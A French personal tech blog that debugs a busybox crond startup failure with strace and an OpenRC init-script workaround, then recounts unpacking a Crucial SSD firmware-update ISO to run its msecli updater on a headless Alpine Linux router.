close(418)                              = -1 EBADF (Bad file descriptor)
close(417)                              = -1 EBADF (Bad file descriptor)
close(416)                              = -1 EBADF (Bad file descriptor)
close(415)                              = -1 EBADF (Bad file descriptor)
close(414)                              = -1 EBADF (Bad file descriptor)
close(413)                              = -1 EBADF (Bad file descriptor)
close(412)                              = -1 EBADF (Bad file descriptor)
close(411)                              = -1 EBADF (Bad file descriptor)
close(410)                              = -1 EBADF (Bad file descriptor)
close(409)                              = -1 EBADF (Bad file descriptor)
close(408)                              = -1 EBADF (Bad file descriptor)
close(407)                              = -1 EBADF (Bad file descriptor)
close(406)                              = -1 EBADF (Bad file descriptor)
close(405)                              = -1 EBADF (Bad file descriptor)
close(404)                              = -1 EBADF (Bad file descriptor)
close(403)                              = -1 EBADF (Bad file descriptor)
close(402)                              = -1 EBADF (Bad file descriptor)
close(401)                              = -1 EBADF (Bad file descriptor)
close(400)                              = -1 EBADF (Bad file descriptor)
close(399)                              = -1 EBADF (Bad file descriptor)
close(398)                              = -1 EBADF (Bad file descriptor)
close(397)                              = -1 EBADF (Bad file descriptor)
close(396)                              = -1 EBADF (Bad file descriptor)
close(395)                              = -1 EBADF (Bad file descriptor)
close(394)                              = -1 EBADF (Bad file descriptor)
close(393)                              = -1 EBADF (Bad file descriptor)
close(392)                              = -1 EBADF (Bad file descriptor)
close(391)                              = -1 EBADF (Bad file descriptor)
close(390)                              = -1 EBADF (Bad file descriptor)
close(389)                              = -1 EBADF (Bad file descriptor)
close(388)                              = -1 EBADF (Bad file descriptor)
close(387)                              = -1 EBADF (Bad file descriptor)
close(386)                              = -1 EBADF (Bad file descriptor)
close(385)                              = -1 EBADF (Bad file descriptor)
close(384)                              = -1 EBADF (Bad file descriptor)
close(383)                              = -1 EBADF (Bad file descriptor)
close(382)                              = -1 EBADF (Bad file descriptor)
close(381)                              = -1 EBADF (Bad file descriptor)
close(380)                              = -1 EBADF (Bad file descriptor)
close(379)                              = -1 EBADF (Bad file descriptor)
close(378)                              = -1 EBADF (Bad file descriptor)
close(377)                              = -1 EBADF (Bad file descriptor)
close(376)                              = -1 EBADF (Bad file descriptor)
close(375)                              = -1 EBADF (Bad file descriptor)
close(374)                              = -1 EBADF (Bad file descriptor)
close(373)                              = -1 EBADF (Bad file descriptor)
close(372)                              = -1 EBADF (Bad file descriptor)
close(371)                              = -1 EBADF (Bad file descriptor)
close(370)                              = -1 EBADF (Bad file descriptor)
close(369)                              = -1 EBADF (Bad file descriptor)
close(368)                              = -1 EBADF (Bad file descriptor)
close(367)                              = -1 EBADF (Bad file descriptor)
close(366)                              = -1 EBADF (Bad file descriptor)
close(365)                              = -1 EBADF (Bad file descriptor)
close(364)                              = -1 EBADF (Bad file descriptor)
close(363)                              = -1 EBADF (Bad file descriptor)
close(362)                              = -1 EBADF (Bad file descriptor)
close(361)                              = -1 EBADF (Bad file descriptor)
close(360)                              = -1 EBADF (Bad file descriptor)
close(359)                              = -1 EBADF (Bad file descriptor)
close(358)                              = -1 EBADF (Bad file descriptor)
close(357)                              = -1 EBADF (Bad file descriptor)
close(356)                              = -1 EBADF (Bad file descriptor)
close(355)                              = -1 EBADF (Bad file descriptor)
close(354)                              = -1 EBADF (Bad file descriptor)
close(353)                              = -1 EBADF (Bad file descriptor)
close(352)                              = -1 EBADF (Bad file descriptor)
close(351)                              = -1 EBADF (Bad file descriptor)
close(350)                              = -1 EBADF (Bad file descriptor)
close(349)                              = -1 EBADF (Bad file descriptor)
close(348)                              = -1 EBADF (Bad file descriptor)
close(347)                              = -1 EBADF (Bad file descriptor)
close(346)                              = -1 EBADF (Bad file descriptor)
close(345)                              = -1 EBADF (Bad file descriptor)
close(344)                              = -1 EBADF (Bad file descriptor)
close(343)                              = -1 EBADF (Bad file descriptor)
close(342)                              = -1 EBADF (Bad file descriptor)
close(341)                              = -1 EBADF (Bad file descriptor)
close(340)                              = -1 EBADF (Bad file descriptor)
close(339)                              = -1 EBADF (Bad file descriptor)
close(338)                              = -1 EBADF (Bad file descriptor)
close(337)                              = -1 EBADF (Bad file descriptor)
close(336)                              = -1 EBADF (Bad file descriptor)
close(335)                              = -1 EBADF (Bad file descriptor)
close(334)                              = -1 EBADF (Bad file descriptor)
close(333)                              = -1 EBADF (Bad file descriptor)
close(332)                              = -1 EBADF (Bad file descriptor)
close(331)                              = -1 EBADF (Bad file descriptor)
close(330)                              = -1 EBADF (Bad file descriptor)
close(329)                              = -1 EBADF (Bad file descriptor)
close(328)                              = -1 EBADF (Bad file descriptor)
close(327)                              = -1 EBADF (Bad file descriptor)
close(326)                              = -1 EBADF (Bad file descriptor)
close(325)                              = -1 EBADF (Bad file descriptor)
close(324)                              = -1 EBADF (Bad file descriptor)
close(323)                              = -1 EBADF (Bad file descriptor)
close(322)                              = -1 EBADF (Bad file descriptor)
close(321)                              = -1 EBADF (Bad file descriptor)
close(320)                              = -1 EBADF (Bad file descriptor)
close(319)                              = -1 EBADF (Bad file descriptor)
close(318)                              = -1 EBADF (Bad file descriptor)
close(317)                              = -1 EBADF (Bad file descriptor)
close(316)                              = -1 EBADF (Bad file descriptor)
close(315)                              = -1 EBADF (Bad file descriptor)
close(314)                              = -1 EBADF (Bad file descriptor)
close(313)                              = -1 EBADF (Bad file descriptor)
close(312)                              = -1 EBADF (Bad file descriptor)
close(311)                              = -1 EBADF (Bad file descriptor)
close(310)                              = -1 EBADF (Bad file descriptor)
close(309)                              = -1 EBADF (Bad file descriptor)
close(308)                              = -1 EBADF (Bad file descriptor)
close(307)                              = -1 EBADF (Bad file descriptor)
close(306)                              = -1 EBADF (Bad file descriptor)
close(305)                              = -1 EBADF (Bad file descriptor)
close(304)                              = -1 EBADF (Bad file descriptor)
close(303)                              = -1 EBADF (Bad file descriptor)
close(302)                              = -1 EBADF (Bad file descriptor)
close(301)                              = -1 EBADF (Bad file descriptor)
close(300)                              = -1 EBADF (Bad file descriptor)
close(299)                              = -1 EBADF (Bad file descriptor)
close(298)                              = -1 EBADF (Bad file descriptor)
close(297)                              = -1 EBADF (Bad file descriptor)
close(296)                              = -1 EBADF (Bad file descriptor)
close(295)                              = -1 EBADF (Bad file descriptor)
close(294)                              = -1 EBADF (Bad file descriptor)
close(293)                              = -1 EBADF (Bad file descriptor)
close(292)                              = -1 EBADF (Bad file descriptor)
close(291)                              = -1 EBADF (Bad file descriptor)
close(290)                              = -1 EBADF (Bad file descriptor)
close(289)                              = -1 EBADF (Bad file descriptor)
close(288)                              = -1 EBADF (Bad file descriptor)
close(287)                              = -1 EBADF (Bad file descriptor)
close(286)                              = -1 EBADF (Bad file descriptor)
close(285)                              = -1 EBADF (Bad file descriptor)
close(284)                              = -1 EBADF (Bad file descriptor)
close(283)                              = -1 EBADF (Bad file descriptor)
close(282)                              = -1 EBADF (Bad file descriptor)
close(281)                              = -1 EBADF (Bad file descriptor)
close(280)                              = -1 EBADF (Bad file descriptor)
close(279)                              = -1 EBADF (Bad file descriptor)
close(278)                              = -1 EBADF (Bad file descriptor)
close(277)                              = -1 EBADF (Bad file descriptor)
close(276)                              = -1 EBADF (Bad file descriptor)
close(275)                              = -1 EBADF (Bad file descriptor)
close(274)                              = -1 EBADF (Bad file descriptor)
close(273)                              = -1 EBADF (Bad file descriptor)
close(272)                              = -1 EBADF (Bad file descriptor)
close(271)                              = -1 EBADF (Bad file descriptor)
close(270)                              = -1 EBADF (Bad file descriptor)
close(269)                              = -1 EBADF (Bad file descriptor)
close(268)                              = -1 EBADF (Bad file descriptor)
close(267)                              = -1 EBADF (Bad file descriptor)
close(266)                              = -1 EBADF (Bad file descriptor)
close(265)                              = -1 EBADF (Bad file descriptor)
close(264)                              = -1 EBADF (Bad file descriptor)
close(263)                              = -1 EBADF (Bad file descriptor)
close(262)                              = -1 EBADF (Bad file descriptor)
close(261)                              = -1 EBADF (Bad file descriptor)
close(260)                              = -1 EBADF (Bad file descriptor)
close(259)                              = -1 EBADF (Bad file descriptor)
close(258)                              = -1 EBADF (Bad file descriptor)
close(257)                              = -1 EBADF (Bad file descriptor)
close(256)                              = -1 EBADF (Bad file descriptor)
close(255)                              = -1 EBADF (Bad file descriptor)
close(254)                              = -1 EBADF (Bad file descriptor)
close(253)                              = -1 EBADF (Bad file descriptor)
close(252)                              = -1 EBADF (Bad file descriptor)
close(251)                              = -1 EBADF (Bad file descriptor)
close(250)                              = -1 EBADF (Bad file descriptor)
close(249)                              = -1 EBADF (Bad file descriptor)
close(248)                              = -1 EBADF (Bad file descriptor)
close(247)                              = -1 EBADF (Bad file descriptor)
close(246)                              = -1 EBADF (Bad file descriptor)
close(245)                              = -1 EBADF (Bad file descriptor)
close(244)                              = -1 EBADF (Bad file descriptor)
close(243)                              = -1 EBADF (Bad file descriptor)
close(242)                              = -1 EBADF (Bad file descriptor)
close(241)                              = -1 EBADF (Bad file descriptor)
close(240)                              = -1 EBADF (Bad file descriptor)
close(239)                              = -1 EBADF (Bad file descriptor)
close(238)                              = -1 EBADF (Bad file descriptor)
close(237)                              = -1 EBADF (Bad file descriptor)
close(236)                              = -1 EBADF (Bad file descriptor)
close(235)                              = -1 EBADF (Bad file descriptor)
close(234)                              = -1 EBADF (Bad file descriptor)
close(233)                              = -1 EBADF (Bad file descriptor)
close(232)                              = -1 EBADF (Bad file descriptor)
close(231)                              = -1 EBADF (Bad file descriptor)
close(230)                              = -1 EBADF (Bad file descriptor)
close(229)                              = -1 EBADF (Bad file descriptor)
close(228)                              = -1 EBADF (Bad file descriptor)
close(227)                              = -1 EBADF (Bad file descriptor)
close(226)                              = -1 EBADF (Bad file descriptor)
close(225)                              = -1 EBADF (Bad file descriptor)
close(224)                              = -1 EBADF (Bad file descriptor)
close(223)                              = -1 EBADF (Bad file descriptor)
close(222)                              = -1 EBADF (Bad file descriptor)
close(221)                              = -1 EBADF (Bad file descriptor)
close(220)                              = -1 EBADF (Bad file descriptor)
close(219)                              = -1 EBADF (Bad file descriptor)
close(218)                              = -1 EBADF (Bad file descriptor)
close(217)                              = -1 EBADF (Bad file descriptor)
close(216)                              = -1 EBADF (Bad file descriptor)
close(215)                              = -1 EBADF (Bad file descriptor)
close(214)                              = -1 EBADF (Bad file descriptor)
close(213)                              = -1 EBADF (Bad file descriptor)
close(212)                              = -1 EBADF (Bad file descriptor)
close(211)                              = -1 EBADF (Bad file descriptor)
close(210)                              = -1 EBADF (Bad file descriptor)
close(209)                              = -1 EBADF (Bad file descriptor)
close(208)                              = -1 EBADF (Bad file descriptor)
close(207)                              = -1 EBADF (Bad file descriptor)
close(206)                              = -1 EBADF (Bad file descriptor)
close(205)                              = -1 EBADF (Bad file descriptor)
close(204)                              = -1 EBADF (Bad file descriptor)
close(203)                              = -1 EBADF (Bad file descriptor)
close(202)                              = -1 EBADF (Bad file descriptor)
close(201)                              = -1 EBADF (Bad file descriptor)
close(200)                              = -1 EBADF (Bad file descriptor)
close(199)                              = -1 EBADF (Bad file descriptor)
close(198)                              = -1 EBADF (Bad file descriptor)
close(197)                              = -1 EBADF (Bad file descriptor)
close(196)                              = -1 EBADF (Bad file descriptor)
close(195)                              = -1 EBADF (Bad file descriptor)
close(194)                              = -1 EBADF (Bad file descriptor)
close(193)                              = -1 EBADF (Bad file descriptor)
close(192)                              = -1 EBADF (Bad file descriptor)
close(191)                              = -1 EBADF (Bad file descriptor)
close(190)                              = -1 EBADF (Bad file descriptor)
close(189)                              = -1 EBADF (Bad file descriptor)
close(188)                              = -1 EBADF (Bad file descriptor)
close(187)                              = -1 EBADF (Bad file descriptor)
close(186)                              = -1 EBADF (Bad file descriptor)
close(185)                              = -1 EBADF (Bad file descriptor)
close(184)                              = -1 EBADF (Bad file descriptor)
close(183)                              = -1 EBADF (Bad file descriptor)
close(182)                              = -1 EBADF (Bad file descriptor)
close(181)                              = -1 EBADF (Bad file descriptor)
close(180)                              = -1 EBADF (Bad file descriptor)
close(179)                              = -1 EBADF (Bad file descriptor)
close(178)                              = -1 EBADF (Bad file descriptor)
close(177)                              = -1 EBADF (Bad file descriptor)
close(176)                              = -1 EBADF (Bad file descriptor)
close(175)                              = -1 EBADF (Bad file descriptor)
close(174)                              = -1 EBADF (Bad file descriptor)
close(173)                              = -1 EBADF (Bad file descriptor)
close(172)                              = -1 EBADF (Bad file descriptor)
close(171)                              = -1 EBADF (Bad file descriptor)
close(170)                              = -1 EBADF (Bad file descriptor)
close(169)                              = -1 EBADF (Bad file descriptor)
close(168)                              = -1 EBADF (Bad file descriptor)
close(167)                              = -1 EBADF (Bad file descriptor)
close(166)                              = -1 EBADF (Bad file descriptor)
close(165)                              = -1 EBADF (Bad file descriptor)
close(164)                              = -1 EBADF (Bad file descriptor)
close(163)                              = -1 EBADF (Bad file descriptor)
close(162)                              = -1 EBADF (Bad file descriptor)
close(161)                              = -1 EBADF (Bad file descriptor)
close(160)                              = -1 EBADF (Bad file descriptor)
close(159)                              = -1 EBADF (Bad file descriptor)
close(158)                              = -1 EBADF (Bad file descriptor)
close(157)                              = -1 EBADF (Bad file descriptor)
close(156)                              = -1 EBADF (Bad file descriptor)
close(155)                              = -1 EBADF (Bad file descriptor)
close(154)                              = -1 EBADF (Bad file descriptor)
close(153)                              = -1 EBADF (Bad file descriptor)
close(152)                              = -1 EBADF (Bad file descriptor)
close(151)                              = -1 EBADF (Bad file descriptor)
close(150)                              = -1 EBADF (Bad file descriptor)
close(149)                              = -1 EBADF (Bad file descriptor)
close(148)                              = -1 EBADF (Bad file descriptor)
close(147)                              = -1 EBADF (Bad file descriptor)
close(146)                              = -1 EBADF (Bad file descriptor)
close(145)                              = -1 EBADF (Bad file descriptor)
close(144)                              = -1 EBADF (Bad file descriptor)
close(143)                              = -1 EBADF (Bad file descriptor)
close(142)                              = -1 EBADF (Bad file descriptor)
close(141)                              = -1 EBADF (Bad file descriptor)
close(140)                              = -1 EBADF (Bad file descriptor)
close(139)                              = -1 EBADF (Bad file descriptor)
close(138)                              = -1 EBADF (Bad file descriptor)
close(137)                              = -1 EBADF (Bad file descriptor)
close(136)                              = -1 EBADF (Bad file descriptor)
close(135)                              = -1 EBADF (Bad file descriptor)
close(134)                              = -1 EBADF (Bad file descriptor)
close(133)                              = -1 EBADF (Bad file descriptor)
close(132)                              = -1 EBADF (Bad file descriptor)
close(131)                              = -1 EBADF (Bad file descriptor)
close(130)                              = -1 EBADF (Bad file descriptor)
close(129)                              = -1 EBADF (Bad file descriptor)
close(128)                              = -1 EBADF (Bad file descriptor)
close(127)                              = -1 EBADF (Bad file descriptor)
close(126)                              = -1 EBADF (Bad file descriptor)
close(125)                              = -1 EBADF (Bad file descriptor)
close(124)                              = -1 EBADF (Bad file descriptor)
close(123)                              = -1 EBADF (Bad file descriptor)
close(122)                              = -1 EBADF (Bad file descriptor)
close(121)                              = -1 EBADF (Bad file descriptor)
close(120)                              = -1 EBADF (Bad file descriptor)
close(119)                              = -1 EBADF (Bad file descriptor)
close(118)                              = -1 EBADF (Bad file descriptor)
close(117)                              = -1 EBADF (Bad file descriptor)
close(116)                              = -1 EBADF (Bad file descriptor)
close(115)                              = -1 EBADF (Bad file descriptor)
close(114)                              = -1 EBADF (Bad file descriptor)
close(113)                              = -1 EBADF (Bad file descriptor)
close(112)                              = -1 EBADF (Bad file descriptor)
close(111)                              = -1 EBADF (Bad file descriptor)
close(110)                              = -1 EBADF (Bad file descriptor)
close(109)                              = -1 EBADF (Bad file descriptor)
close(108)                              = -1 EBADF (Bad file descriptor)
close(107)                              = -1 EBADF (Bad file descriptor)
close(106)                              = -1 EBADF (Bad file descriptor)
close(105)                              = -1 EBADF (Bad file descriptor)
close(104)                              = -1 EBADF (Bad file descriptor)
close(103)                              = -1 EBADF (Bad file descriptor)
close(102)                              = -1 EBADF (Bad file descriptor)
close(101)                              = -1 EBADF (Bad file descriptor)
close(100)                              = -1 EBADF (Bad file descriptor)
close(99)                               = -1 EBADF (Bad file descriptor)
close(98)                               = -1 EBADF (Bad file descriptor)
close(97)                               = -1 EBADF (Bad file descriptor)
close(96)                               = -1 EBADF (Bad file descriptor)
close(95)                               = -1 EBADF (Bad file descriptor)
close(94)                               = -1 EBADF (Bad file descriptor)
close(93)                               = -1 EBADF (Bad file descriptor)
close(92)                               = -1 EBADF (Bad file descriptor)
close(91)                               = -1 EBADF (Bad file descriptor)
close(90)                               = -1 EBADF (Bad file descriptor)
close(89)                               = -1 EBADF (Bad file descriptor)
close(88)                               = -1 EBADF (Bad file descriptor)
close(87)                               = -1 EBADF (Bad file descriptor)
close(86)                               = -1 EBADF (Bad file descriptor)
close(85)                               = -1 EBADF (Bad file descriptor)
close(84)                               = -1 EBADF (Bad file descriptor)
close(83)                               = -1 EBADF (Bad file descriptor)
close(82)                               = -1 EBADF (Bad file descriptor)
close(81)                               = -1 EBADF (Bad file descriptor)
close(80)                               = -1 EBADF (Bad file descriptor)
close(79)                               = -1 EBADF (Bad file descriptor)
close(78)                               = -1 EBADF (Bad file descriptor)
close(77)                               = -1 EBADF (Bad file descriptor)
close(76)                               = -1 EBADF (Bad file descriptor)
close(75)                               = -1 EBADF (Bad file descriptor)
close(74)                               = -1 EBADF (Bad file descriptor)
close(73)                               = -1 EBADF (Bad file descriptor)
close(72)                               = -1 EBADF (Bad file descriptor)
close(71)                               = -1 EBADF (Bad file descriptor)
close(70)                               = -1 EBADF (Bad file descriptor)
close(69)                               = -1 EBADF (Bad file descriptor)
close(68)                               = -1 EBADF (Bad file descriptor)
close(67)                               = -1 EBADF (Bad file descriptor)
close(66)                               = -1 EBADF (Bad file descriptor)
close(65)                               = -1 EBADF (Bad file descriptor)
close(64)                               = -1 EBADF (Bad file descriptor)
close(63)                               = -1 EBADF (Bad file descriptor)
close(62)                               = -1 EBADF (Bad file descriptor)
close(61)                               = -1 EBADF (Bad file descriptor)
close(60)                               = -1 EBADF (Bad file descriptor)
close(59)                               = -1 EBADF (Bad file descriptor)
close(58)                               = -1 EBADF (Bad file descriptor)
close(57)                               = -1 EBADF (Bad file descriptor)
close(56)                               = -1 EBADF (Bad file descriptor)
close(55)                               = -1 EBADF (Bad file descriptor)
close(54)                               = -1 EBADF (Bad file descriptor)
close(53)                               = -1 EBADF (Bad file descriptor)
close(52)                               = -1 EBADF (Bad file descriptor)
close(51)                               = -1 EBADF (Bad file descriptor)
close(50)                               = -1 EBADF (Bad file descriptor)
close(49)                               = -1 EBADF (Bad file descriptor)
close(48)                               = -1 EBADF (Bad file descriptor)
close(47)                               = -1 EBADF (Bad file descriptor)
close(46)                               = -1 EBADF (Bad file descriptor)
close(45)                               = -1 EBADF (Bad file descriptor)
close(44)                               = -1 EBADF (Bad file descriptor)
close(43)                               = -1 EBADF (Bad file descriptor)
close(42)                               = -1 EBADF (Bad file descriptor)
close(41)                               = -1 EBADF (Bad file descriptor)
close(40)                               = -1 EBADF (Bad file descriptor)
close(39)                               = -1 EBADF (Bad file descriptor)
close(38)                               = -1 EBADF (Bad file descriptor)
close(37)                               = -1 EBADF (Bad file descriptor)
close(36)                               = -1 EBADF (Bad file descriptor)
close(35)                               = -1 EBADF (Bad file descriptor)
close(34)                               = -1 EBADF (Bad file descriptor)
close(33)                               = -1 EBADF (Bad file descriptor)
close(32)                               = -1 EBADF (Bad file descriptor)
close(31)                               = -1 EBADF (Bad file descriptor)
close(30)                               = -1 EBADF (Bad file descriptor)
close(29)                               = -1 EBADF (Bad file descriptor)
close(28)                               = -1 EBADF (Bad file descriptor)
close(27)                               = -1 EBADF (Bad file descriptor)
close(26)                               = -1 EBADF (Bad file descriptor)
close(25)                               = -1 EBADF (Bad file descriptor)
close(24)                               = -1 EBADF (Bad file descriptor)
close(23)                               = -1 EBADF (Bad file descriptor)
close(22)                               = -1 EBADF (Bad file descriptor)
close(21)                               = -1 EBADF (Bad file descriptor)
close(20)                               = -1 EBADF (Bad file descriptor)
close(19)                               = -1 EBADF (Bad file descriptor)
close(18)                               = -1 EBADF (Bad file descriptor)
close(17)                               = -1 EBADF (Bad file descriptor)
close(16)                               = -1 EBADF (Bad file descriptor)
close(15)                               = -1 EBADF (Bad file descriptor)
close(14)                               = -1 EBADF (Bad file descriptor)
close(13)                               = -1 EBADF (Bad file descriptor)
close(12)                               = -1 EBADF (Bad file descriptor)
close(11)                               = -1 EBADF (Bad file descriptor)
close(10)                               = -1 EBADF (Bad file descriptor)
close(9)                                = -1 EBADF (Bad file descriptor)
close(8)                                = -1 EBADF (Bad file descriptor)
close(7)                                = -1 EBADF (Bad file descriptor)
close(6)                                = -1 EBADF (Bad file descriptor)
close(5)                                = -1 EBADF (Bad file descriptor)
close(4)                                = 0
close(3)                                = -1 EBADF (Bad file descriptor)
setsid()                                = 7011
execve("/usr/sbin/crond", ["/usr/sbin/crond", "-c", "/etc/crontabs", "-f"], [/* 19 vars */]) = 0
arch_prctl(ARCH_SET_FS, 0x7d500e02bb48) = 0
set_tid_address(0x7d500e02bb80)         = 7011
mprotect(0x7d500e028000, 4096, PROT_READ) = 0
mprotect(0xa38e79f1000, 4096, PROT_READ) = 0
getuid()                                = 0
close(0)                                = 0
close(1)                                = 0
open("/dev/null", O_RDWR)               = 0
dup2(0, 0)                              = 0
dup2(0, 1)                              = 1
mkdir("/tmp/cron.FmJlEk", 0700)         = 0
chmod("/tmp/cron.FmJlEk", 0755)         = 0
setpgid(0, 0)                           = -1 EPERM (Operation not permitted)
writev(2, [{iov_base="", iov_len=0}, {iov_base="setpgid", iov_len=7}], 2) = 7
writev(2, [{iov_base="", iov_len=0}, {iov_base=":", iov_len=1}], 2) = 1
writev(2, [{iov_base="", iov_len=0}, {iov_base=" ", iov_len=1}], 2) = 1
writev(2, [{iov_base="", iov_len=0}, {iov_base="Operation not permitted", iov_len=23}], 2) = 23
writev(2, [{iov_base="", iov_len=0}, {iov_base="\n", iov_len=1}], 2) = 1
exit_group(1)                           = ?
+++ exited with 1 +++

Je ne sais pas pourquoi j’ai autant de EBADF, mais ce n’est pas ce flood qui est responsable du problème. On observe que crond a bien été lancé, puis il tente un appel à setpgid qui se solde par un échec, suivi presque immédiatement d’une mort du process.

Il se trouve justement qu’un ticket a été ouvert concernant ce problème avec setpgid. Pour ma part, ne voyant absolument pas à quoi ce truc sert, le man étant particulièrement inutile à fournir une explication claire, j’ai fait au plus simple en modifiant l’init.d plutôt que le code source de dcron.

C’est très clairement dégueulasse mais ça marche. Tu veux voir le résultat 😀 :

#!/sbin/openrc-run

name="busybox $SVCNAME"
command="/usr/sbin/$SVCNAME"
pidfile="/var/run/$SVCNAME.pid"
command_args="$CRON_OPTS"
#command_background=yes
#start_stop_daemon_args="-b -m"

depend() {
        need localmount
        need logger
}

start_post() {
        local pids pid ppid

        pids=`pidof $SVCNAME`
        pid=0

        for pid in $pids; do
                ppid=`grep '^PPid:' /proc/$pid/status | grep -o '[0-9]*'`

                if [ "$ppid" = '1' ]; then
                        echo "$pid" > $pidfile
                        return 0;
                fi
        done
}

J’avais prévenu… En attendant une éventuelle résolution du ticket, c’est une solution raisonnable.

Mise à jour du firmware de mon SSD, the hard way

Posted on 9 avril 2017Leave a comment

J’ai un SSD pour lequel le constructeur a sorti une mise à jour du firmware. Il s’agit du modèle M550 de chez Crucial qui passe de la version M01 à la version M02. Ce SSD est au format mSata, dans mon routeur qui est un APU1 de PCEngines. Ce routeur n’a pas de sortie vidéo, ne fonctionne pas sous Windows mais sous Linux, et n’a pas de lecteur CD. Quelque chose me dit que cela ne va pas me prendre 5 minutes…

Pour mettre à niveau le firmware, je dispose de deux possibilités :

connecter le SSD sur une autre machine plus « standard » et faire la mise à jour depuis cette machine. J’aurais bien opté pour cette solution si j’avais eu un adaptateur SATA > mSATA, et puis cela aurait été moins fun, non ?
mettre à jour directement le SSD sans utiliser le tournevis

Crucial met à disposition le package de mise à niveau sous la forme d’une image CD. Je pourrais éventuellement brancher un lecteur CD en USB au routeur, voire même modifier le bootloader pour booter directement sur l’iso mais il est fort à parier que le CD n’a pas été prévu pour un contrôle depuis le port série, voie sans issue donc.

CD, dis-moi qui tu es

Explorons un peu le contenu de cette image.

On commence à avoir des choses intéressantes. Le CD contient un noyau linux (vmlinuz) et le bootloader est isolinux, un standard pour booter du linux depuis un CD ou une clé USB. Je serais tombé sur une mise à jour basée sur DOS (Caldera DOS, FreeDOS…), j’aurais été bon pour acheter l’adaptateur.

Examinons le fichier de configuration du bootloader:

DEFAULT sd

LABEL sd
KERNEL /boot/vmlinuz
INITRD /boot/core.gz
APPEND quiet base loglevel=3 waitusb=10 superuser rssd-fw-update rssd-fwdir=/opt/firmware rssd-model=M550

On remarque un certain nombre de paramètres non standard, ainsi que le initrd.

Hacking the kernel

Pour continuer l’analyse de l’iso, je redémarre redémarre le routeur sur la sdcard (système de secours si le ssd lache) afin de laisser totalement inutilisé le SSD, puis copier le contenu de l’iso dans disons /tmp/crucial/iso . Qui dit initrd dit cpio. Je décompresse donc core.gz puis extrayons le contenu de l’archive cpio dans /tmp/crucial/root .

Le point d’entrée par défaut est le script /init , vu qu’il n’a pas été redéfini dans les paramètres envoyés au kernel.
Il est d’une extrême simplicité et se résume à :

monter /proc
lancer /sbin/init

init , s’il s’agit du bon vieux process racine servant à faire fonctionner Linux, va se servir de /etc/init.d afin d’initialiser les différentes partie du système. Certains de ces scripts sont reconnaissable (rc.shutdown) voir inutile à vue (dhcp.sh, settime.sh…). Il y en a un toutefois qui retient mon attention : msd-config.sh car son nom ne m’est absolument pas familier.

Bingo ! Ce script, simple également, récupère les paramètres envoyés au kernel, via le fichier /proc/cmdline , et lancer le processus msecli avec les paramètres adéquat. Il va notamment utiliser le paramètre kernel rssd-model=M550 , ce qui me conforte que je suis bien sur la bonne piste, le M550 étant pour rappel le modèle de mon SSD.

Au final, le script exécutera la commande suivante : /sbin/msecli -U -i /opt/firmware -m M550 -y .

Allons-y :

apu:/tmp/boot/root# ./sbin/msecli --help
-ash: ./sbin/msecli: not found
apu:/tmp/boot/root# ll ./sbin/msecli
-rwxr-xr-x    1 root     root      635.5K Apr  9 14:22 ./sbin/msecli
apu:/tmp/boot/root# ldd ./sbin/msecli
ldd: ./sbin/msecli: Not a valid dynamic program

Le fichier est bien présent, pourtant il n’est pas possible de l’exécuter. C’est plutôt bizarre…

Go down the rabbit hole

Une analyse sauvage du fichier (sous vim) m’apprend qu’il s’agit d’un exécutable non statique, c’est à dire qu’il utilise des librairies chargées dynamiquement. Sachant que le Linux hôte est Alpine Linux, la libc en vigueur n’est pas l’immonde glibc mais musl. Comme indiqué ci-dessous, la présence de /lib/ld-linux.so.2 trahit le caractère dynamique de l’exécutable. Cela explique également pourquoi le ldd sur l’hôte n’est pas parvenu à parser correctement l’exécutable.

^?ELF^A^A^A^@^@^@^@^@^@^@^@^@^B^@^C^@^A^@^@^@<90>)^E^H4^@^@^@Ì  ^@^@^@^@^@4^@ ^@^H^@(^@^]^@^Z^@^F^@^@^@4^@^@^@4<80>^D^H4<80>^D^H^@^A^@^@^@^A^@^@^E^@^@^@^D^@^@^@^C^@^@^@4^A^@^@4<81>^D^H4<81>^D^H^S^@^@^@^S^@^@^@^D^@^@^@^A^@^@^@^A^@^@^@^@^@^@^@^@<80>^D^H^@<80>^D^H^T^U       ^@^T^U  ^@^E^@^@^@^@^P^@^@^A^@^@^@^T^U  ^@^T¥^M^H^T¥^M^H^T^C^@^@t1^@^@^F^@^@^@^@^P^@^@^B^@^@^@(^U       ^@(¥^M^H(¥^M^Hà^@^@^@à^@^@^@^F^@^@^@^D^@^@^@^D^@^@^@H^A^@^@H<81>^D^HH<81>^D^H ^@^@^@ ^@^@^@^D^@^@^@^D^@^@^@Påtd^@Ò^H^@^@R^M^H^@R^M^H<84>^N^@^@<84>^N^@^@^D^@^@^@^D^@^@^@Qåtd^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^F^@^@^@^D^@^@^@/lib/ld-linux.so.2^@^@^D^@^@^@^P^@^@^@^A^@^@^@GNU^@^@^@^@^@^B^@^@^@^F^@^@^@ ^@^@^@  ^B^@^@I^@^@^@<80>^@^@^@^L^@^@^@D

Je tente un chroot pour résoudre cela ?

apu:/tmp/boot/root# chroot . sh
apu:/# ldd sbin/msecli
        linux-gate.so.1 (0xe82ba000)
        libpthread.so.0 => /lib/libpthread.so.0 (0xe82a0000)
        libstdc++.so.6 => /usr/lib/libstdc++.so.6 (0xe81e3000)
        libm.so.6 => /lib/libm.so.6 (0xe81ac000)
        libc.so.6 => /lib/libc.so.6 (0xe808f000)
        /lib/ld-linux.so.2 (0xe82bb000)
        libgcc_s.so.1 => /usr/lib/libgcc_s.so.1 (0xe8079000)
apu:/# msecli --help
USAGE:
msecli <Main Option> -?

    Provides the detailed usage information for the specified main option

NOTE: All options are not supported by all drives

msecli -L [-a] [-d|-P|-f] [-n <device-name>]  [-r ] [-s <out-filename>]

    Lists the basic information for all micron drives available in the system

msecli -S [-a] [-e|-d] [-l <log-type[0 | 1 | 2 | 3 | 6 | 7]>]
    [-t <Self-test type[0 | 1 | 2]>] [-n <device-name>] [-r] [-s <out-filename>]

    Lists the SMART values for the supported parameters for the micron drives
    available in the system.

msecli -M [-i <value> | -w <state-value> | -p <state-value> ] -n <device-name> [-r] [-s <out-filename>]

    To manage the Micron PCIe drives.

msecli -X [-B | -p <password> | -P -p <PSID> ] -n <device-name> [-r] [-s <out-filename>]

    Performs Secure Erase, Sanitize Block Erase, or PSID Revert for the
    specified micron drive

msecli -D -n <device-name> [-r] [-s <out-filename>]

    Displays the Driver and Host Information for the given <device-name>

msecli -T <UBI img-file> [ [-n <device-name> [-b] [-o]] [-i <firmware-slot>] | -d ] [-n <device-name>..] [-r] [-s <out-filename>]

    Updates the UBI image in the specified Micron PCIe drive.

msecli -m -n <device-name>[-d <duration>] [-i <interval>] [-r] [-s <out-filename>]

